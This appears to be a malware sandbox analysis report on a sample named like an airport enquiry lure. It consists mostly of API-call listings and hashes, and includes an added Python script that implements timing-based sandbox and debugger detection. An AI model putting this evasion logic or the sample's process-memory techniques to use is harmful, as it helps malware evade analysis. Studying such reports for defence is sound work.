            • Associated: 00000000.00000002.1687727691.0000000000D35000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1687791917.0000000000D3F000.00000004.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1687806940.0000000000D48000.00000002.00000001.01000000.00000003.sdmp
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_c80000_New Al Maktoum International Airport Enquiry Ref #2401249.jbxd
            Similarity
            • API ID: MessageSend$__itow$_memmove
            • String ID:
            • API String ID: 2983881199-0
            • Opcode ID: 4de1d3a090988673dabbc79628268a7707c644f1be0fef618670e9cf053b254f
            • Instruction ID: fcd4ca3139fed2db33472c97d81b80dc96e1beb95738c4ac14ac69778a8ab307
            • Opcode Fuzzy Hash: 4de1d3a090988673dabbc79628268a7707c644f1be0fef618670e9cf053b254f
            • Instruction Fuzzy Hash: F021CB35B00304AFDB10AB658C86EAE7BA9EF4AB14F14002AFA05D7391D671DD45E7A1
            APIs
            • ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 00C8134D
            • SelectObject.GDI32(?,00000000), ref: 00C8135C
            • BeginPath.GDI32(?), ref: 00C81373
            • SelectObject.GDI32(?,00000000), ref: 00C8139C
            Memory Dump Source
            • Source File: 00000000.00000002.1687606854.0000000000C81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true
            • Associated: 00000000.00000002.1687554635.0000000000C80000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1687727691.0000000000D0F000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1687727691.0000000000D35000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1687791917.0000000000D3F000.00000004.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1687806940.0000000000D48000.00000002.00000001.01000000.00000003.sdmp
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_c80000_New Al Maktoum International Airport Enquiry Ref #2401249.jbxd
            Similarity
            • API ID: ObjectSelect$BeginCreatePath
            • String ID:
            • API String ID: 3225163088-0
            • Opcode ID: 33307bb12aba419d22f2c2ed86c8f6506a0424461580e002fc9ee5f22a1c2274
            • Instruction ID: d11311a4f4cdbb1a9eeb06be839ec4cd42b29c00f03af12edad0e6c6f9f3b1c7
            • Opcode Fuzzy Hash: 33307bb12aba419d22f2c2ed86c8f6506a0424461580e002fc9ee5f22a1c2274
            • Instruction Fuzzy Hash: 97215174800308DBDB119F25DC047697BF8EB12326F184225F815D66F0D371D992DBA5
            APIs
            Memory Dump Source
            • Source File: 00000000.00000002.1687606854.0000000000C81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true
            • Associated: 00000000.00000002.1687554635.0000000000C80000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1687727691.0000000000D0F000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1687727691.0000000000D35000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1687791917.0000000000D3F000.00000004.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1687806940.0000000000D48000.00000002.00000001.01000000.00000003.sdmp
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_c80000_New Al Maktoum International Airport Enquiry Ref #2401249.jbxd
            Similarity
            • API ID: _memcmp
            • String ID:
            • API String ID: 2931989736-0
            • Opcode ID: 595d6fe48f69eb5e1db358cdd9a311bac1207c8613176ec7ad8e9850e617b6f6
            • Instruction ID: 719c8e3000fcea4e7186df3bcfbdd5d83c588fb0cf45025de33e21e061615d56
            • Opcode Fuzzy Hash: 595d6fe48f69eb5e1db358cdd9a311bac1207c8613176ec7ad8e9850e617b6f6
            • Instruction Fuzzy Hash: 330196716042277BD204A5215CC2EFF635DDF22398F084112FF14D6343EA61DE25D2E1
            APIs
            • GetCurrentThreadId.KERNEL32 ref: 00CE4D5C
            • __beginthreadex.LIBCMT ref: 00CE4D7A
            • MessageBoxW.USER32(?,?,?,?), ref: 00CE4D8F
            • WaitForSingleObject.KERNEL32(00000000,000000FF,?,?,?,?), ref: 00CE4DA5
            • CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 00CE4DAC
            Memory Dump Source
            • Source File: 00000000.00000002.1687606854.0000000000C81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true
            • Associated: 00000000.00000002.1687554635.0000000000C80000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1687727691.0000000000D0F000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1687727691.0000000000D35000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1687791917.0000000000D3F000.00000004.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1687806940.0000000000D48000.00000002.00000001.01000000.00000003.sdmp
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_c80000_New Al Maktoum International Airport Enquiry Ref #2401249.jbxd
            Similarity
            • API ID: CloseCurrentHandleMessageObjectSingleThreadWait__beginthreadex
            • String ID:
            • API String ID: 3824534824-0
            • Opcode ID: 54f175512d4fbda2778187d54c28fa64b0c0b43b3008b5b8deaae934cfd7376a
            • Instruction ID: ca9650b7de557a0437a8383bde1a489a6a866042f9715cfa83ee8968cd248b7d
            • Opcode Fuzzy Hash: 54f175512d4fbda2778187d54c28fa64b0c0b43b3008b5b8deaae934cfd7376a
            • Instruction Fuzzy Hash: B81144B6904348BFC7108FA9DC48A9A7FACEB46320F244269F928D3350C6B1CE0087B1
            APIs
            • GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 00CD8766
            • GetLastError.KERNEL32(?,00CD822A,?,?,?), ref: 00CD8770
            • GetProcessHeap.KERNEL32(00000008,?,?,00CD822A,?,?,?), ref: 00CD877F
            • HeapAlloc.KERNEL32(00000000,?,00CD822A,?,?,?), ref: 00CD8786
            • GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 00CD879D
            Memory Dump Source
            • Source File: 00000000.00000002.1687606854.0000000000C81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true
            • Associated: 00000000.00000002.1687554635.0000000000C80000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1687727691.0000000000D0F000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1687727691.0000000000D35000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1687791917.0000000000D3F000.00000004.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1687806940.0000000000D48000.00000002.00000001.01000000.00000003.sdmp
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_c80000_New Al Maktoum International Airport Enquiry Ref #2401249.jbxd
            Similarity
            • API ID: HeapObjectSecurityUser$AllocErrorLastProcess
            • String ID:
            • API String ID: 842720411-0
            • Opcode ID: 5967624f1f9a219c898475708c9ea778eaf1cd3a46a8971ff23d8f1b281cdd08
            • Instruction ID: 1facd924a1107aebebe55e5a98de121e506245508cb4c6db0fd0951e4f92f915
            • Opcode Fuzzy Hash: 5967624f1f9a219c898475708c9ea778eaf1cd3a46a8971ff23d8f1b281cdd08
            • Instruction Fuzzy Hash: AE014B71600304EFDB204FA6DC88E6B7BACEF89355720042AF94DC2360DA329D04CA70
            APIs
            • QueryPerformanceCounter.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 00CE5502
            • QueryPerformanceFrequency.KERNEL32(?,?,?,?,?,?,?,?,?,?,?), ref: 00CE5510
            • Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?), ref: 00CE5518
            • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,?,?,?,?), ref: 00CE5522
            • Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 00CE555E
            Memory Dump Source
            • Source File: 00000000.00000002.1687606854.0000000000C81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true
            • Associated: 00000000.00000002.1687554635.0000000000C80000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1687727691.0000000000D0F000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1687727691.0000000000D35000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1687791917.0000000000D3F000.00000004.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1687806940.0000000000D48000.00000002.00000001.01000000.00000003.sdmp
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_c80000_New Al Maktoum International Airport Enquiry Ref #2401249.jbxd
            Similarity
            • API ID: PerformanceQuery$CounterSleep$Frequency
            • String ID:
            • API String ID: 2833360925-0
            • Opcode ID: be9fbd03d6d3afcc3f2a839c98f018995bcf4f941e4be979fdf38d3cf18ba2f3
            • Instruction ID: 17be1a4a95fec1ced5a04cd42b477e2c53bb3415ff1d7b06ba1d57bc354102c4
            • Opcode Fuzzy Hash: be9fbd03d6d3afcc3f2a839c98f018995bcf4f941e4be979fdf38d3cf18ba2f3
            • Instruction Fuzzy Hash: 61015B32D01B19DBCF10DFEAE8886EDBB79BB09705F500056E805F2640DB309650C7A2
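The routine above brackets Sleep between two QueryPerformanceCounter reads, scaled by QueryPerformanceFrequency. The report's signature list flags execution timing of this kind as a debugger-detection indicator; whether this particular AutoIt runtime routine is used that way is not established by the listing, so the detection reading below is an assumption. The following Python is an added example, not the sample's code: it reproduces the counter/sleep/counter measurement with time.perf_counter() standing in for the performance counter, and shows how the measured interval is turned into a verdict. A sandbox that patches Sleep to return immediately while leaving the counter alone produces a measured interval far shorter than requested; a debugger single-stepping through the bracketed region produces one far longer. Thresholds are illustrative, not taken from the report.

```python
import time

# Added illustration of the QueryPerformanceCounter / Sleep / QueryPerformanceCounter
# pattern listed at 00CE5502-00CE5522. Not the sample's code: time.perf_counter() stands
# in for QueryPerformanceCounter+QueryPerformanceFrequency and time.sleep() for Sleep.

def measure_sleep(requested_s):
    """Sleep for requested_s seconds and return the interval the high-resolution
    counter says actually elapsed (counter-before / Sleep / counter-after)."""
    start = time.perf_counter()
    time.sleep(requested_s)
    return time.perf_counter() - start

def timing_verdict(requested_s, measured_s, low=0.5, high=20.0):
    """Classify one (requested, measured) pair.

    'accelerated': measured is below low*requested; typical of a sandbox that short-
                   circuits Sleep but does not adjust the performance counter.
    'stalled':     measured is above high*requested; typical of a debugger single-
                   stepping or a breakpoint inside the bracketed region.
    'normal':      anything in between.
    The low/high factors are assumed thresholds, not values from the report.
    """
    if requested_s <= 0:
        raise ValueError("requested_s must be positive")
    ratio = measured_s / requested_s
    if ratio < low:
        return "accelerated"
    if ratio > high:
        return "stalled"
    return "normal"

def majority_verdict(samples, **thresholds):
    """Take several (requested, measured) pairs and return the most common verdict, so
    that one scheduling hiccup does not decide the outcome. Ties fall back to 'normal'."""
    verdicts = [timing_verdict(r, m, **thresholds) for r, m in samples]
    counts = {v: verdicts.count(v) for v in set(verdicts)}
    best = max(counts.values())
    winners = [v for v, c in counts.items() if c == best]
    return winners[0] if len(winners) == 1 else "normal"

if __name__ == "__main__":
    live = [(0.02, measure_sleep(0.02)) for _ in range(5)]
    print("live run:", majority_verdict(live))
    # Constructed samples imitating a sandbox that skips Sleep entirely.
    skipped = [(2.0, 0.0003), (2.0, 0.0002), (2.0, 0.0004)]
    print("sleep-skipping sandbox:", majority_verdict(skipped))
```

For an analyst the practical consequence is the inverse of the check: if a sandbox fast-forwards sleeps to save wall-clock time, it must also advance whatever counter the sample reads, otherwise the discrepancy itself is the tell.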
            APIs
            • CLSIDFromProgID.OLE32(?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00CD758C,80070057,?,?,?,00CD799D), ref: 00CD766F
            • ProgIDFromCLSID.OLE32(?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00CD758C,80070057,?,?), ref: 00CD768A
            • lstrcmpiW.KERNEL32(?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00CD758C,80070057,?,?), ref: 00CD7698
            • CoTaskMemFree.OLE32(00000000,?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00CD758C,80070057,?), ref: 00CD76A8
            • CLSIDFromString.OLE32(?,?,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00CD758C,80070057,?,?), ref: 00CD76B4
            Memory Dump Source
            • Source File: 00000000.00000002.1687606854.0000000000C81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true
            • Associated: 00000000.00000002.1687554635.0000000000C80000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1687727691.0000000000D0F000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1687727691.0000000000D35000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1687791917.0000000000D3F000.00000004.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1687806940.0000000000D48000.00000002.00000001.01000000.00000003.sdmp
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_c80000_New Al Maktoum International Airport Enquiry Ref #2401249.jbxd
            Similarity
            • API ID: From$Prog$FreeStringTasklstrcmpi
            • String ID:
            • API String ID: 3897988419-0
            • Opcode ID: dbbad12e0d183b90cf57414535db8204832072010200fe6dc90a83096a20f76d
            • Instruction ID: 48fd74afd87dfb58febdf3a5543214073bb8722c88ec93a7be942b392b950610
            • Opcode Fuzzy Hash: dbbad12e0d183b90cf57414535db8204832072010200fe6dc90a83096a20f76d
            • Instruction Fuzzy Hash: DD0171B2601704ABDB209F58DC48BAE7BADEB44751F24412AFE08D2321F731DE4197B0
            APIs
            • GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 00CD8608
            • GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 00CD8612
            • GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 00CD8621
            • HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 00CD8628
            • GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 00CD863E
            Memory Dump Source
            • Source File: 00000000.00000002.1687606854.0000000000C81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true
            • Associated: 00000000.00000002.1687554635.0000000000C80000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1687727691.0000000000D0F000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1687727691.0000000000D35000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1687791917.0000000000D3F000.00000004.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1687806940.0000000000D48000.00000002.00000001.01000000.00000003.sdmp
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_c80000_New Al Maktoum International Airport Enquiry Ref #2401249.jbxd
            Similarity
            • API ID: HeapInformationToken$AllocErrorLastProcess
            • String ID:
            • API String ID: 44706859-0
            • Opcode ID: 6734796ef6cba41409139b433617629c60a89e68ad5ff25e0d08d11070e2e369
            • Instruction ID: 54fe7b8b10b0981f3c3a6f4d76a43d44f568cb785d71d33fa4f2edb217dff839
            • Opcode Fuzzy Hash: 6734796ef6cba41409139b433617629c60a89e68ad5ff25e0d08d11070e2e369
            • Instruction Fuzzy Hash: BCF04F31205304AFEB200FA9DC89F6B3BACEF89764B10442AFA49C6250CB61DD46DA70
            APIs
            • GetTokenInformation.ADVAPI32(?,00000003(TokenPrivileges),?,00000000,?), ref: 00CD8669
            • GetLastError.KERNEL32(?,TokenPrivileges,?,00000000,?), ref: 00CD8673
            • GetProcessHeap.KERNEL32(00000008,?,?,TokenPrivileges,?,00000000,?), ref: 00CD8682
            • HeapAlloc.KERNEL32(00000000,?,TokenPrivileges,?,00000000,?), ref: 00CD8689
            • GetTokenInformation.ADVAPI32(?,00000003(TokenPrivileges),00000000,?,?,?,TokenPrivileges,?,00000000,?), ref: 00CD869F
            Memory Dump Source
            • Source File: 00000000.00000002.1687606854.0000000000C81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true
            • Associated: 00000000.00000002.1687554635.0000000000C80000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1687727691.0000000000D0F000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1687727691.0000000000D35000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1687791917.0000000000D3F000.00000004.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1687806940.0000000000D48000.00000002.00000001.01000000.00000003.sdmp
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_c80000_New Al Maktoum International Airport Enquiry Ref #2401249.jbxd
            Similarity
            • API ID: HeapInformationToken$AllocErrorLastProcess
            • String ID:
            • API String ID: 44706859-0
            • Opcode ID: 2c52accddcf5d963f71ab5281fa766aca90840e771b67ddc80915883851bbfa0
            • Instruction ID: f7ea40f3fdb6b5fc6e109e46e2b41bbef5edf6dbabbab953d806932778629d04
            • Opcode Fuzzy Hash: 2c52accddcf5d963f71ab5281fa766aca90840e771b67ddc80915883851bbfa0
            • Instruction Fuzzy Hash: 9AF04F71240304BFEB211FA5ECC9F673BACEF89764B20002AFA59C7250CA65D945DA70
            APIs
            • GetDlgItem.USER32(?,000003E9), ref: 00CDC6BA
            • GetWindowTextW.USER32(00000000,?,00000100), ref: 00CDC6D1
            • MessageBeep.USER32(00000000), ref: 00CDC6E9
            • KillTimer.USER32(?,0000040A), ref: 00CDC705
            • EndDialog.USER32(?,00000001), ref: 00CDC71F
            Memory Dump Source
            • Source File: 00000000.00000002.1687606854.0000000000C81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true
            • Associated: 00000000.00000002.1687554635.0000000000C80000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1687727691.0000000000D0F000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1687727691.0000000000D35000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1687791917.0000000000D3F000.00000004.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1687806940.0000000000D48000.00000002.00000001.01000000.00000003.sdmp
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_c80000_New Al Maktoum International Airport Enquiry Ref #2401249.jbxd
            Similarity
            • API ID: BeepDialogItemKillMessageTextTimerWindow
            • String ID:
            • API String ID: 3741023627-0
            • Opcode ID: e192460b0c8e7c48ace0fc9c9a4b5307c397bc18d8417beb7637f96494053036
            • Instruction ID: 83f0dfceaf24a11f14c2e8a3f3de6bedddcf69b7864ad2323fb99aa027ad8710
            • Opcode Fuzzy Hash: e192460b0c8e7c48ace0fc9c9a4b5307c397bc18d8417beb7637f96494053036
            • Instruction Fuzzy Hash: 72018F30400305ABEB315B20DC8EB9677B8FB00705F14066AB696E16E0DBE1A955CB90
            APIs
            • EndPath.GDI32(?), ref: 00C813BF
            • StrokeAndFillPath.GDI32(?,?,00CBBAD8,00000000,?), ref: 00C813DB
            • SelectObject.GDI32(?,00000000), ref: 00C813EE
            • DeleteObject.GDI32 ref: 00C81401
            • StrokePath.GDI32(?), ref: 00C8141C
            Memory Dump Source
            • Source File: 00000000.00000002.1687606854.0000000000C81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true
            • Associated: 00000000.00000002.1687554635.0000000000C80000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1687727691.0000000000D0F000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1687727691.0000000000D35000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1687791917.0000000000D3F000.00000004.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1687806940.0000000000D48000.00000002.00000001.01000000.00000003.sdmp
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_c80000_New Al Maktoum International Airport Enquiry Ref #2401249.jbxd
            Similarity
            • API ID: Path$ObjectStroke$DeleteFillSelect
            • String ID:
            • API String ID: 2625713937-0
            • Opcode ID: 37633d2873c2d421158eeed5da42fab8fb2b36aa0c58742b18969a306f3d9289
            • Instruction ID: 62901f587da88b4c9a1de884985f0265568366c9eded70dd79b049e441fed2a5
            • Opcode Fuzzy Hash: 37633d2873c2d421158eeed5da42fab8fb2b36aa0c58742b18969a306f3d9289
            • Instruction Fuzzy Hash: 96F0CD74004308DBDB215F16EC0C7543BE9A742326F58C224E92AC56F1C7318596DF75
            APIs
            • CoInitialize.OLE32(00000000), ref: 00CEC69D
            • CoCreateInstance.OLE32(00D12D6C,00000000,00000001,00D12BDC,?), ref: 00CEC6B5
              • Part of subcall function 00C87F41: _memmove.LIBCMT ref: 00C87F82
            • CoUninitialize.OLE32 ref: 00CEC922
            Strings
            Memory Dump Source
            • Source File: 00000000.00000002.1687606854.0000000000C81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true
            • Associated: 00000000.00000002.1687554635.0000000000C80000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1687727691.0000000000D0F000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1687727691.0000000000D35000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1687791917.0000000000D3F000.00000004.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1687806940.0000000000D48000.00000002.00000001.01000000.00000003.sdmp
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_c80000_New Al Maktoum International Airport Enquiry Ref #2401249.jbxd
            Similarity
            • API ID: CreateInitializeInstanceUninitialize_memmove
            • String ID: .lnk
            • API String ID: 2683427295-24824748
            • Opcode ID: a169fce4a6840c5ca17d6cef72c4e88dde8aa5fbbab2c95499ad021470ae14e4
            • Instruction ID: 1342ed7cc959f576b27caba3f70b51b60dde513b8fd56fa48493019d9a659771
            • Opcode Fuzzy Hash: a169fce4a6840c5ca17d6cef72c4e88dde8aa5fbbab2c95499ad021470ae14e4
            • Instruction Fuzzy Hash: 5FA12B71108205AFD304EF54C8C1EABB7E8EF88708F14491CF156971A2EB71EA49DB66
            APIs
              • Part of subcall function 00CA0FF6: std::exception::exception.LIBCMT ref: 00CA102C
              • Part of subcall function 00CA0FF6: __CxxThrowException@8.LIBCMT ref: 00CA1041
              • Part of subcall function 00C87F41: _memmove.LIBCMT ref: 00C87F82
              • Part of subcall function 00C87BB1: _memmove.LIBCMT ref: 00C87C0B
            • __swprintf.LIBCMT ref: 00C9302D
            Strings
            • \\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs], xrefs: 00C92EC6
            Similarity
            • API ID: _memmove$Exception@8Throw__swprintfstd::exception::exception
            • String ID: \\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs]
            • API String ID: 1943609520-557222456
            APIs
              • Part of subcall function 00C848AE: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00C848A1,?,?,00C837C0,?), ref: 00C848CE
            • CoInitialize.OLE32(00000000), ref: 00CEBC26
            • CoCreateInstance.OLE32(00D12D6C,00000000,00000001,00D12BDC,?), ref: 00CEBC3F
            • CoUninitialize.OLE32 ref: 00CEBC5C
              • Part of subcall function 00C89997: __itow.LIBCMT ref: 00C899C2
              • Part of subcall function 00C89997: __swprintf.LIBCMT ref: 00C89A0C
            Strings
            Similarity
            • API ID: CreateFullInitializeInstanceNamePathUninitialize__itow__swprintf
            • String ID: .lnk
            • API String ID: 2126378814-24824748
            APIs
            • __startOneArgErrorHandling.LIBCMT ref: 00CA52DD
              • Part of subcall function 00CB0340: __87except.LIBCMT ref: 00CB037B
            Strings
            Similarity
            • API ID: ErrorHandling__87except__start
            • String ID: pow
            • API String ID: 2905807303-2276729525
            Strings
            Similarity
            • API ID:
            • String ID: #$+
            • API String ID: 0-2552117581
            APIs
            Strings
            Similarity
            • API ID: _memset$_memmove
            • String ID: ERCP
            • API String ID: 2532777613-1384759551
            APIs
              • Part of subcall function 00CE19CC: WriteProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,00CD9778,?,?,00000034,00000800,?,00000034), ref: 00CE19F6
            • SendMessageW.USER32(?,00001104,00000000,00000000), ref: 00CD9D21
              • Part of subcall function 00CE1997: ReadProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,00CD97A7,?,?,00000800,?,00001073,00000000,?,?), ref: 00CE19C1
              • Part of subcall function 00CE18EE: GetWindowThreadProcessId.USER32(?,?), ref: 00CE1919
              • Part of subcall function 00CE18EE: OpenProcess.KERNEL32(00000438,00000000,?,?,?,00CD973C,00000034,?,?,00001004,00000000,00000000), ref: 00CE1929
              • Part of subcall function 00CE18EE: VirtualAllocEx.KERNEL32(00000000,00000000,?,00001000,00000004,?,?,00CD973C,00000034,?,?,00001004,00000000,00000000), ref: 00CE193F
            • SendMessageW.USER32(?,00001111,00000000,00000000), ref: 00CD9D8E
            • SendMessageW.USER32(?,00001111,00000000,00000000), ref: 00CD9DDB
            Strings
            Similarity
            • API ID: Process$MessageSend$Memory$AllocOpenReadThreadVirtualWindowWrite
            • String ID: @
            • API String ID: 4150878124-2766056989
            APIs
            • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000013,?,?,SysTreeView32,00D0F910,00000000,?,?,?,?), ref: 00D07C4E
            • GetWindowLongW.USER32 ref: 00D07C6B
            • SetWindowLongW.USER32(?,000000F0,00000000), ref: 00D07C7B
            Strings
            Similarity
            • API ID: Window$Long
            • String ID: SysTreeView32
            • API String ID: 847901565-1698111956
            APIs
            • SendMessageW.USER32(00000000,00001009,00000000,?), ref: 00D076D0
            • SetWindowPos.USER32(?,00000000,?,?,?,?,00000004), ref: 00D076E4
            • SendMessageW.USER32(?,00001002,00000000,?), ref: 00D07708
            Strings
            Similarity
            • API ID: MessageSend$Window
            • String ID: SysMonthCal32
            • API String ID: 2326795674-1439706946
            APIs
            • SendMessageW.USER32(00000000,00000180,00000000,?), ref: 00D06FAA
            • SendMessageW.USER32(?,00000186,00000000,00000000), ref: 00D06FBA
            • MoveWindow.USER32(?,?,?,?,?,00000000,?,?,Listbox,00000000,00000000,?,?,?,?,?), ref: 00D06FDF
            Strings
            Similarity
            • API ID: MessageSend$MoveWindow
            • String ID: Listbox
            • API String ID: 3315199576-2633736733
            APIs
            • SendMessageW.USER32(00000000,00000405,00000000,00000000), ref: 00D079E1
            • SendMessageW.USER32(?,00000406,00000000,00640000), ref: 00D079F6
            • SendMessageW.USER32(?,00000414,0000000A,00000000), ref: 00D07A03
            Strings
            Similarity
            • API ID: MessageSend
            • String ID: msctls_trackbar32
            • API String ID: 3850602802-1010561917
            APIs
            • LoadLibraryA.KERNEL32(kernel32.dll,?,00C84C2E), ref: 00C84CA3
            • GetProcAddress.KERNEL32(00000000,GetNativeSystemInfo), ref: 00C84CB5
            Strings
            Similarity
            • API ID: AddressLibraryLoadProc
            • String ID: GetNativeSystemInfo$kernel32.dll
            • API String ID: 2574300362-192647395
            APIs
            • LoadLibraryA.KERNEL32(kernel32.dll,?,00C84CE1,?), ref: 00C84DA2
            • GetProcAddress.KERNEL32(00000000,Wow64RevertWow64FsRedirection), ref: 00C84DB4
            Strings
            Similarity
            • API ID: AddressLibraryLoadProc
            • String ID: Wow64RevertWow64FsRedirection$kernel32.dll
            • API String ID: 2574300362-1355242751
            APIs
            • LoadLibraryA.KERNEL32(kernel32.dll,?,00C84D2E,?,00C84F4F,?,00D462F8,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?), ref: 00C84D6F
            • GetProcAddress.KERNEL32(00000000,Wow64DisableWow64FsRedirection), ref: 00C84D81
            Strings
            Similarity
            • API ID: AddressLibraryLoadProc
            • String ID: Wow64DisableWow64FsRedirection$kernel32.dll
            • API String ID: 2574300362-3689287502
            APIs
            • LoadLibraryA.KERNEL32(advapi32.dll,?,00D012C1), ref: 00D01080
            • GetProcAddress.KERNEL32(00000000,RegDeleteKeyExW), ref: 00D01092
            Strings
            Similarity
            • API ID: AddressLibraryLoadProc
            • String ID: RegDeleteKeyExW$advapi32.dll
            • API String ID: 2574300362-4033151799
            APIs
            • LoadLibraryA.KERNEL32(kernel32.dll,00000001,00CF9009,?,00D0F910), ref: 00CF9403
            • GetProcAddress.KERNEL32(00000000,GetModuleHandleExW), ref: 00CF9415
            Strings
            Similarity
            • API ID: AddressLibraryLoadProc
            • String ID: GetModuleHandleExW$kernel32.dll
            • API String ID: 2574300362-199464113
            APIs
            Strings
            Similarity
            • API ID: LocalTime__swprintf
            • String ID: %.3d$WIN_XPe
            • API String ID: 2070861257-2409531811
            Similarity
            • API ID:
            • String ID:
            • API String ID:
            APIs
            • CharLowerBuffW.USER32(?,?), ref: 00CFE3D2
            • CharLowerBuffW.USER32(?,?), ref: 00CFE415
              • Part of subcall function 00CFDAB9: CharLowerBuffW.USER32(?,?,?,?,00000000,?,?), ref: 00CFDAD9
            • VirtualAlloc.KERNEL32(00000000,00000077,00003000,00000040), ref: 00CFE615
            • _memmove.LIBCMT ref: 00CFE628
            Similarity
            • API ID: BuffCharLower$AllocVirtual_memmove
            • String ID:
            • API String ID: 3659485706-0
            APIs
            • CoInitialize.OLE32(00000000), ref: 00CF83D8
            • CoUninitialize.OLE32 ref: 00CF83E3
